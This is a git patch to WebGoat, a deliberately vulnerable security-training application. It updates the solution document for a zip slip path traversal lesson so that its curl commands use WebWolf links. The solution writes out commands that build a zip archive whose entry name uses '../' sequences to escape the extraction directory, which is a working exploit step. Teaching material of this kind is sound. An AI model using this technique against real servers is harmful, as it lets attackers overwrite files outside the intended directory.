From 54e115aff05eb9cf155899cdc73651afa7e604f0 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 5 Jan 2023 07:49:15 +0100 Subject: [PATCH] Update the solution with WebWolf URLs The new solution uses WebWolf paths as these will change automatically when a user start WebGoat on a different port. It no longer depends on the hardcoded port `8080`. --- .../documentation/PathTraversal_zip_slip_solution.adoc | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc index a9a71af73..a324008f4 100644 --- a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc +++ b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc @@ -2,10 +2,10 @@ First, let's create a zip file with an image inside: -[source] +[source, subs="macros"] ---- -curl -o cat.jpg http://localhost:8080/WebGoat/images/cats/1.jpg -zip profile.zip cat.jpg +curl -o webwolf.jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png] +zip profile.zip webwolf.jpg ---- Now let's upload this as our profile image. We can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is: @@ -23,7 +23,7 @@ First, create the directory structure: ---- mkdir -p webGoatTempDir:temppath[]PathTraversal/username:user[] cd webGoatTempDir:temppath[]PathTraversal/username:user[] -curl -o username:user[] http://localhost:8080/WebGoat/images/cats/1.jpg +curl -o username:user[].jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png] zip profile.zip ../../../../../../../..webGoatTempDir:temppath[]PathTraversal/username:user[]/username:user[].jpg ----